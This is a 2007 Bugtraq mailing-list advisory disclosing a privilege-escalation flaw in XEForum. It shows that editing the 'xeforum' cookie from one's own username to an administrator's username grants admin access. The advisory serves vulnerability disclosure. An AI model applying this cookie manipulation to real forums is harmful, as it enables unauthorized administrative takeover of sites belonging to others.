[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070628011255.10376.qmail@securityfocus.com>
Date: 28 Jun 2007 01:12:55 -0000
From: Firewall1954@...mail.com
To: bugtraq@...urityfocus.com
Subject: XEForum Cookie Modification Privilege Escalation Vulnerability
-------------------------------------------------------------------- XEForum Cookie Modification Privilege Escalation Vulnerability
--------------------------------------------------------------------
Vulnerable product: XEForum
Vendor: http://www.xeforum.com/
Date:
--------------------
Found: Jun 26, 2007
Vulnerability:
--------------------
XeForum contains a flaw that may allow a remote attacker to gain administrative privileges.
Modifying contained cookie you can change of session and to even enter like administrator.
Cookie:
-----------------------------------
: Cookie: xeforum="Your Username" :
-----------------------------------
change to:
------------------------------------
: Cookie: xeforum="Admin Username" :
------------------------------------
Credit:
--------------------
Firewall
Firewall of Peru
Firewall@...mail.com
Greetz to Swp-Scene And Revolutionz
http://4firewall.uni.cc
--------------------------------------------------------------------
Powered by blists - more mailing lists